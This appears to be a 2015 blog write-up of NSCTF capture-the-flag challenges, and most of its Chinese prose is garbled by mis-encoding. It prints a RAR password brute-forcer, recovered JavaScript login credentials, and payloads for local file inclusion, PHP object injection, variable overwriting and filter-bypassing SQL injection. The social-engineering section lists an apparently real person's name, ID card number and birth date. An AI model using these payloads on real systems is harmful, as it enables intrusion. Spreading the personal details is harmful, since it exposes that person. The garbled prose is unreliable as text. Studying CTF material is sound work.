LoRexxar's Blog

Nsctf2015_Writeup

2015/09/28

浠9鏈26鍙峰紑濮嬫帴杩炴捀浜3涓猚tf锛宯sctf锛実ctf锛岃秼鍔縞tf锛岃櫧鐒跺疄鍔涜繕鏈夊緟鎻愰珮锛屼絾鏄垢杩愮殑鏄痭sctf鎰忓鎾歌繘浜嗗墠50鍚嶏紝涔熷仛浜嗕笉灏憌eb棰橈紝杩欓噷鍏堝啓涓媙sctf鐨剋riteup鐣欏瓨.

杩欒竟璐翠笂鏈缁堢殑鍚嶆鍜屽畬鎴愭儏鍐碉紝绠楁槸鐣欎釜绾康銆

MISC

0x01 Twitter Point: 100 (Done)

绛惧埌棰橈紝娌′粈涔堝ソ璇寸殑銆
鍏虫敞NSCTF twitter锛岀劧鍚庡緱鍒癶ash
fc42aa2046ed6e90cab82b1094b19adb
MD5瑙e瘑寰楀埌nsfocus666
鎸夋牸寮忓姞鍏ワ紝Get锛

0x02 WireShark Point: 250

棰樼洰鏄垎鏋愭暟鎹寘锛屽疄鍦ㄤ笉浼氾紝鐢╳ireshark缈讳簡缈诲緱鍒版湁涓猭ey.rar锛屽浜嗕篃涓嶄細浜嗭紝杩欓噷璐翠笂ddog鐨勪唬鐮侊紙涓嶇煡閬撴垜缂轰簡浠涔堟楠わ紝鍙嶆鏄病鐢ㄢ)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import rarfile
import os
from threading import Thread
import time
a = range(10000,100000)
#def genaratePass():
# for i in a:
# return "nsfocus" + str(i)
def pojie_rar():
path = './key.rar'
rar = rarfile.RarFile("key.rar", mode='r')
for i in a:
password = 'nsfocus' + str(i)
#print password
try:
rar.extractall(path="./", pwd=password)
print ' ----success!,The password is %s' % password
rar.close()
return True
except:
pass
#print ''
#def genaratePass():
#for i in xrange(00000, 99999):
# return 'nsfocus' + str(i)
if __name__ == '__main__':
pojie_rar()

0x03 灏忕豢鐨勫コ绁 Point: 300 (Done)

棰樼洰寮濮嬫病鍋氾紝鍘熼娌℃湁鎴浘锛屽ぇ姒傛槸璇村コ绁炵殑鐢熸棩鏄2鏈8鍙凤紝鎯充负濂崇鍏呭煎埌208鍏冿紝鏌ヨ浣欓寰楀埌208灏卞彲浠ュ緱鍒癴lag锛岃瀹炶瘽鍗佸叚杩涘埗浠呬粎鏄兘鐪嬫噦鑰屽凡锛屽悗鏉绁炲憡璇夋垜鍘熺悊锛岃繖閲岃创涓婏紝涔熺畻鏄浜嗕竴涓粡鍘嗐

杩欓涓昏鐨勯棶棰樺氨鏄紝鍗′腑鏈3鐐瑰緢鍏抽敭锛
1銆佹秷璐圭殑閲戦
2銆佽繖寮犲崱鐨勯噾棰濅笂闄
3銆佽繖寮犲崱鐨勪綑棰
2=1+3
鍗$殑缁撴瀯澶ф鏄繖鏍风殑

鏍规嵁鎻忚堪搴旇寰堝鏄撶湅鍑虹粨鏋勶紝鏄疭 ~S S ~S杩欐牱鐨勭粨鏋
鍒嗘瀽寰楀埌绗竴閮ㄥ垎鏄秷璐圭殑閲戦锛岀浜岄儴鍒嗘槸鍗$殑鎬婚涔熷氨鏄笂闄愶紝绗笁閮ㄥ垎鏄崱鐨勪綑棰濄
寰堥噸瑕佺殑涓鐐瑰氨鏄16杩涘埗鏁板瓧鍦ㄥ唴瀛樹腑鏄皬绔榻愬瓨鏀剧殑
鎵浠姣斿杩欎釜鍏跺疄鏄0xFFFFD5D0

鎵浠ユ渶鍚庝慨鏀圭殑鏍峰瓙灏辨槸杩欐牱鐨勶細

鎻愪氦 Get Flag!

crypto

0x01 绁炲鐨勫瓧绗︿覆 Point 100 (Done)

棰樼洰寰堢畝鍗曪紝鍙笉杩囦竴寮濮嬬湅鍒版嚨浜嗭紝鍚庢潵鎶婂ご鎷栧幓鐧惧害锛屽緱鍒癆ES鍔犲瘑锛屽緱鍒癴lag锛岀劧鍚庡悗闈㈡寜鐓SCTF鐨勬牸寮忎綅绉伙紝Get Flag!

0x02 绁炲鐨勫浘鐗 Point 100

杩欓亾棰樻槸涓寮犲浘鐗囬锛屽紑濮嬬敤Stegsolve缈讳簡缈绘病浠涔堟敹鑾凤紝鎯冲埌鍙兘鏄袱寮犲浘鐗囧悎璧锋潵锛屼絾鏄垜鎵句笉鍒板浘鐗囩殑澶达紝鎵浠ユ渶鍚庡彧鑳芥斁寮冭繖棰

0x03 绁炵鐨勫浘鐗+10086 Point 200 (Done)

鍥剧墖闅愬啓锛岀敤Stegsolve缈荤炕鎵惧埌涓寮犲緢鍍忎簩缁寸爜鐨勫浘鐗囷紝鍜屾甯哥殑姣斿鍙戠幇榛戠櫧鎹㈣繃浜嗭紝鐢╬s澶勭悊鎵爜Get Flag

web

0x01 Be careful Point 100 (Done)

杩欓鐩畝鐩村潙锛屾墦寮椤甸潰浠涔堜笢瑗块兘娌℃湁锛岀炕浠涔堥兘寰椾笉鍒版湁鐢ㄧ殑淇℃伅锛屾渶鍚庤剳娲炲姞Index.php鍜宨ndex.html锛屽彂鐜癐ndex.php浼氬彂鐢熻烦杞紝鍒癷ndex.html锛屼簬鏄嫤鎴煡鐪嬫簮鐮侊紝Get flag!

0x02 Where are you come from Point 100 (Done)

棰樼洰绠鐩寸嫍琛锛屾墦寮寮瑰嚭鏉ヤ竴涓綘鏉ヨ嚜鐏槦鍚楋紵绗竴鍙嶅簲鏄敼refferer锛屾庝箞鏀归兘娌$敤锛屽悗闈㈤櫎浜唄it:鍙湁鏈満鎵嶈兘璁块棶锛屼簬鏄湪header涓坊鍔犱簡x-forwarded-for锛屽紑濮嬩竴鐩翠互涓烘槸127.0.01锛屾棤鎰忛棿鑴戞礊nsctf瀹樼綉ip锛孏et flag!
ps:涓诲姙鏂圭畝鐩存湁鐥呫傘傘

0x03 Version Point 100 (Done)

鎵撳紑棰樼洰锛屾槸涓涓彁浜hp鐗堟湰鐨勯鐩紝绗竴鍙嶅簲鏄痓urp璺憄hp鐗堟湰锛屽悇绉嶄笉鍑恒傚畼鏂筯it锛氭彁绀哄氨鏄櫘閫氱殑php鐗堟湰锛屼笉鐢ㄥ鎯炽傛棤鎰忛棿寰楀埌鎻愮ず鈥
http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/03/?ver=5.5.9-1ubuntu4.12

Get Flag鈥︿笉澶氳浜嗭紝杩欒剳娲炵畝鐩寸浜烘墠鑳芥兂鍒

0x04 Brute force Point:200 (Done)

鐪嬪悕瀛楀氨鐭ラ亾鏄burp璺戝瘑鐮侊紝鐪嬪埌title鏄痯assword.txt锛屾墦寮鍙戠幇瀵嗙爜琛紝burp璺戝嚭寰楀埌瀵嗙爜锛岀櫥褰曞緱鍒颁簡鍩熷悕锛
http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/04/290bca70c7dae93db6644fa00b9d83b9.php?act=add

杩涘叆鏄浣跨敤绠$悊鍛樼暀瑷灏卞彲浠ュ緱鍒癴lag锛屽彂鐜颁簡闅愯棌鍙傛暟鏄敤鎴峰悕锛岃緭鍏ヤ簡admin鐣欒█涓嶈锛屽悇绉嶆敞鍏ュ悇绉峹ss涓嶈锛岀粨鏋滄棤鎰忛棿璇曚簡root鈥
GetFlag锛

0x05 Decode Point:200 (Done)

棰樼洰娌′粈涔堝ソ璇寸殑锛岀櫨搴︿笅鍚勪釜鍑芥暟灏辩煡閬撴槸浠涔堟剰鎬濅簡锛屾瀯閫犺剼鏈珿et flag銆

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
$x=base64_decode(fjg4OjM2ZTFiZzg0MzhlNDE3NTdkOjI5Y2dlYjZlNDhjYEdVRFRPfDtoYm1n);
for($i=0;$i<strlen($x);$i++){
$c = substr($x,$i,1);
$y = ord($c)-1;
$c = chr($y);
$key = $key.$c;
}
$key = strrev($key);
echo $key;
?>

0x06 javascript Point:200 (Done)

鐪嬪埌javascript浼拌宸茬粡鑳芥兂鍒版槸浠涔堥鐩簡锛宩s浠g爜鍘绘贩娣嗐傝繖鏃跺欑敤鍒颁竴涓鍣紝灏辨槸firefox鎺у埗鍙帮紙褰撶劧chrome涔熷彲浠ワ級
鎶婅繖涓鍫嗕贡涓冨叓绯熺殑涓滆タ鎷栧幓鎺у埗鍙帮紝鐒跺悗缇庡寲婧愮爜锛屽緱鍒拌兘鐪嬬殑鍑芥暟澹版槑锛

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
eval(function (p, a, c, k, e, d) {
e = function (c) {
return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) d[e(c)] = k[c] || e(c);
k = [
function (e) {
return d[e]
}
];
e = function () {
return '\\w+'
};
c = 1;
};
while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p;
}

鑷充簬璺熷湪鍚庨潰鐨勪笢瑗匡紝鍙互鐭ラ亾灏辨槸瀵瑰簲鐨勫弬鏁皃,a,c,k,e,d锛屽埆琚繖涔变竷鍏碂鐨勪笢瑗垮悡鍒帮紝鎵惧埌鍑犱釜鏈夌敤鐨勶紝
灏辨槸涓涓猵锛屽湪鍗曞紩鍙蜂腑闂寸殑涓滆タ锛屾嫋鍒版帶鍒跺彴锛岀編鍖栨簮浠g爜锛屽緱鍒颁笅闈㈢殑涓滆タ銆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
_f = function () {
var f = document.createElement('form');
document.getElementById('login').appendChild(f);
f.name = 'login';
return f
}();
_uname = function () {
var uname = document.createElement('input');
uname.type = 'text';
uname.id = 'uname';
uname.value = 'Input Username';
uname.style.margin = '0px 0px 0px 60px';
_f.appendChild(uname);
uname.onfocus = function () {
if (this.value == 'Input Username') this.value = ''
};
uname.onblur = function () {
if (this.value == '') this.value = 'Input Username'
};
return uname
}();
_br = function () {
var br = document.createElement('br');
_f.appendChild(br);
br = document.createElement('br');
_f.appendChild(br);
return br
}();
_upass = function () {
var upass = document.createElement('input');
upass.type = 'password';
upass.id = 'upass';
upass.value = 'Input Password';
upass.style.margin = '0px 0px 0px 60px';
_f.appendChild(upass);
upass.onfocus = function () {
if (this.value == 'Input Password') this.value = ''
};
upass.onblur = function () {
if (this.value == '') this.value = 'Input Password'
};
return upass
}();
_btn = function () {
var btn = document.createElement('input');
_f.appendChild(btn);
btn.type = 'button';
btn.value = 'login';
btn.onclick = function () {
uname = document.getElementById('uname').value;
upass = document.getElementById('upass').value;
if (uname == '') alert('Please Input Username!');
else if (upass == '') alert('Please Input Password!');
else {
eval(unescape('var%20strKey1%20%3D%20%22JaVa3C41ptIsAGo0DStAff%22%3B%0Avar%20strKey2%20%3D%20%22CaNUknOWThIsK3y%22%3B%0Avar%20strKey3%20%3D%20String.fromCharCode%2871%2C%2048%2C%20111%2C%20100%2C%2033%29%3B%0Aif%20%28uname%20%3D%3D%20%28strKey3%20+%20%28%28%28strKey1.toLowerCase%28%29%29.substring%280%2C%20strKey1.indexOf%28%220%22%29%29%20+%20strKey2.substring%282%2C%206%29%29.toUpperCase%28%29%29.substring%280%2C%2015%29%29%29%20%7B%0A%20%20%20%20var%20strKey4%20%3D%20%27Java_Scr1pt_Pa4sW0rd_K3y_H3re%27%3B%0A%20%20%20%20if%20%28upass%20%3D%3D%20%28strKey4.substring%28strKey4.indexOf%28%271%27%2C%205%29%2C%20strKey4.length%20-%20strKey4.indexOf%28%27_%27%29%20+%205%29%29%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28%27Login%20Success%21%27%29%3B%0A%20%20%20%20%20%20%20%20document.getElementById%28%27key%27%29.innerHTML%20%3D%20unescape%28%22%253Cfont%2520color%253D%2522%2523000%2522%253Ea2V5X0NoM2NrXy50eHQ%3D%253C/font%253E%22%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20alert%28%27Password%20Error%21%27%29%3B%0A%20%20%20%20%7D%0A%7D%20else%20%7B%0A%20%20%20%20alert%28%27Login%20Failed%21%27%29%3B%0A%7D'))
}
};
return false
}();

鐩镐俊寰堝鏄撳氨鑳界湅鍑洪棶棰樹簡锛岀劧鍚庢妸eval鏁翠釜澶嶅埗杩涙帶鍒跺彴锛屾妸eval鏀逛负alert鎴栬呯洿鎺ocument.write,寰楀埌鍏抽敭婧愮爜锛

1
2
3
4
5
6
7
8
9
10
11
12
13
14
var strKey1 = "JaVa3C41ptIsAGo0DStAff";
var strKey2 = "CaNUknOWThIsK3y";
var strKey3 = String.fromCharCode(71, 48, 111, 100, 33);
if (uname == (strKey3 + (((strKey1.toLowerCase()).substring(0, strKey1.indexOf("0")) + strKey2.substring(2, 6)).toUpperCase()).substring(0, 15))) {
var strKey4 = 'Java_Scr1pt_Pa4sW0rd_K3y_H3re';
if (upass == (strKey4.substring(strKey4.indexOf('1', 5), strKey4.length - strKey4.indexOf('_') + 5))) {
alert('Login Success!');
document.getElementById('key').innerHTML = unescape("%3Cfont%20color%3D%22%23000%22%3Ea2V5X0NoM2NrXy50eHQ=%3C/font%3E");
} else {
alert('Password Error!');
}
} else {
alert('Login Failed!');
}

杩欐椂鍊欏鏋滀綘鐩存帴鎶妘nscape涓殑涓滆タ鎷垮嚭鏉ヨ闂殑璇濓紝浠栦細鎻愮ず浣犵殑鐢ㄦ埛鍚嶉敊璇紝鏈潵浠ヤ负鏄痗ookie鐨勯棶棰橈紝鎵浠ュ洖鍘昏窇鍑
uname=G0od!JAVA3C41PTISAGO
upass=1pt_Pa4sW0rd_K3y_H3re
鐧诲綍浠嶇劧鏃犳灉锛岃剳娲炰竴寮post鏁版嵁锛孏et Flag!

0x07 social engeer Point:150(Done)

棰樼洰寰堟壇娣★紝缁欏嚭灏忔槑鐨勫悕瀛楀拰鐢熸棩杩樻湁qq锛岄渶瑕佽窇鍑哄瘑鐮侊紝鍚勭灏濊瘯鏃犳灉瀹樻柟缁欏嚭浜唄it銆
hit:寰堢畝鍗曠殑涓枃瀵嗙爜锛屽鍚嶅姞鐢熸棩锛屾敞鎰忓ぇ灏忓啓銆
浜庢槸鍐欏瓧鍏歌窇锛屽緱鍒颁簡瀵嗙爜Xiaoming09231995锛岃繖鏃跺欏嚭鐜颁簡绗簩姝ワ紙鏈鍧戠殑鍦版柟锛夛紝
棰樼洰瑕佹眰閫氳繃鐢佃瘽绀惧伐鐜嬪厛鐢熺殑淇℃伅锛岃繖閲屽彧鏄彁鍒颁簡绀惧伐锛屼絾鏄苟娌℃湁璇村埌浠涔堢▼搴︿細寰楀埌flag锛屼簬鏄緱鍒颁簡涓澶у爢淇℃伅锛
1銆佸井淇″姞濂藉弸鎵句竴涓嬶紝浼
2銆佹敮浠樺疂杞处鎼滀竴涓嬭处鍙凤紝鐜嬩紵 娴欐睙鍢夊叴
3銆佹墜鏈簈q鎼滀竴涓 鐜嬫钖囩埜鐖 31宀 娴欐睙鏉窞
4銆佽韩浠借瘉锛34112519831224875X
5銆佸嚭鐢熷勾鏈堟棩锛19831224
6銆佽韩浠借瘉澶村緱鍒扮殑鏄 瀹夊窘鐪佹粊宸炲競瀹氳繙鍘

鏈鍚庤閫肩殑娌″姙娉曡繕鍙戜簡鐭俊锛岀粨鏋滃彂鐜拌繖鏄湡浜猴紙瀹樻柟鍜岀帇浼熷埌搴曚粈涔堟剚浠涔堟級锛屾渶鍚庡紑鑴戞礊锛屾兂鍒板彲鑳借繕鏄痗heck鐨勫湴鏂规湁闂锛岃緭鍏ヨ韩浠借瘉Get Flag!

ps:鍒嫤鐫鎴戯紝鎴戣鎶ヨ浜

0x08 LFI Point:200(Done)

娌′粈涔堝彲璇寸殑锛屾枃浠朵笂浼
php://filter/read=convert.base64-encode/resource=index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
error_reporting(0);
if(isset($_POST['submit'])){
if(isset($_POST['file'])){
$file = $_POST['file'];
$method = explode("=", $file);
if( ($method[0] == "php://filter/read") && ($method[2] == "index.php") ){
include($file);
exit();
}else{
exit('error file or error method');
}
}
}

0x09 change password Point:300 (Done)

灏濊瘯浜嗕笅锛屾劅瑙夊簲璇ユ槸鏈夋簮鐮侊紝浜庢槸鎵惧埌.index.php.swp婧愮爜锛岃繖閲屾簮鐮佸繕璁颁繚瀛樹笅鏉ヤ簡锛屽璁′唬鐮佹瀯閫爌ayload,杩欓噷鏈変釜鍧戯紝涔熶笉鐭ラ亾涓诲姙鏂规槸涓嶆槸鑴戝瓙鏈夊潙銆傘傘俰d瑕佺瓑浜1锛屾儻鎬ф濈淮鏄痗ookie閲岄潰鍙戠幇鐨勫師瀵嗙爜150923鍜宨d=3

payload:userInfo=a:2:{s:2:鈥漣d鈥;i:1;s:4:鈥漰ass鈥;s:8:鈥20150923鈥;}&oldPass=20150923&newPass=321321

Get Flag!

0x0A Variable cover Point:250 (Done)

棰樼洰寮濮嬪畬鍏ㄦ病鏈夋濊矾锛屾敞鍏ュ畬鍏ㄨ繃涓嶅幓锛屽畼鏂圭粰鍑篽it:涓嶆寜甯哥悊鐨勫浠芥枃浠躲
鐒跺悗鍚勭寮鑴戞礊锛屾棤鎰忛棿鍙戠幇Index.php.锛屾簮鐮佸緱鍒板紑濮嬫瀯閫爌ayload銆

payload:username=鈥檘we&password=||1#&Submit=%E6%8F%90%E4%BA%A4&_CONFIG=123321

杩欓噷username=鈥 => username=\鈥 => username[0]=\

鎵浠et Flag!

0x0B File Upload Point:400 (Done)

0x0C SQLI Point:350 (Done)

绋嶅井缈讳簡缈绘簮鐮侊紝鍙戠幇浜嗛殣钘忓弬鏁癴iltername锛屾祴璇曚笅鍙戠幇锛
filtername鏄繃婊ゅ櫒锛屽彲浠ラ氳繃璁剧疆filtername缁曡繃瀵箄sername鐨勯儴鍒嗚繃婊
username=teadminst&filtername=admin 浼氬厛杩囨护鍐嶆煡璇

鍓╀笅灏辨槸瀵瑰崟寮曞彿鐨勮繃婊わ紝杩欓噷鐢ㄤ簡涓涓粦绉戞妧%2527,杩欓噷%25琚В鏋愭垚%锛岀劧鍚庡崟寮曞彿鎴愬姛锛屼簬鏄瀯閫爌ayload锛

1
username=admin%2527+uniewqoN+Aewqll+sEleewqct+(group_concat(flag)),2+from+flag#&filtername=ewq

Get Flag!

鎬讳綋璇存潵杩欐nsctf鏀惰幏寰堝锛岀煡閬撳緢澶氫互鍓嶄笉鐭ラ亾鐨勯粦绉戞妧锛岀粡杩囦竴涓亣鏈熺殑瀛︽湡锛屽鍘熸潵寰堝涓嶆噦寰椾笢瑗挎湁浜嗘柊鐨勮璇嗭紝杩樻湁z绁炲拰鍛靛懙鎶垜涓鎵嬶紝杩涗簡鍓50锛屽緢寮蹇冿紙0銆0锛

CATALOG
  1. 1. MISC
    1. 1.1. 0x01 Twitter Point: 100 (Done)
    2. 1.2. 0x02 WireShark Point: 250
    3. 1.3. 0x03 灏忕豢鐨勫コ绁 Point: 300 (Done)
  2. 2. crypto
    1. 2.1. 0x01 绁炲鐨勫瓧绗︿覆 Point 100 (Done)
    2. 2.2. 0x02 绁炲鐨勫浘鐗 Point 100
    3. 2.3. 0x03 绁炵鐨勫浘鐗+10086 Point 200 (Done)
  3. 3. web
    1. 3.1. 0x01 Be careful Point 100 (Done)
    2. 3.2. 0x02 Where are you come from Point 100 (Done)
    3. 3.3. 0x03 Version Point 100 (Done)
    4. 3.4. 0x04 Brute force Point:200 (Done)
    5. 3.5. 0x05 Decode Point:200 (Done)
    6. 3.6. 0x06 javascript Point:200 (Done)
    7. 3.7. 0x07 social engeer Point:150(Done)
    8. 3.8. 0x08 LFI Point:200(Done)
    9. 3.9. 0x09 change password Point:300 (Done)
    10. 3.10. 0x0A Variable cover Point:250 (Done)
    11. 3.11. 0x0B File Upload Point:400 (Done)
    12. 3.12. 0x0C SQLI Point:350 (Done)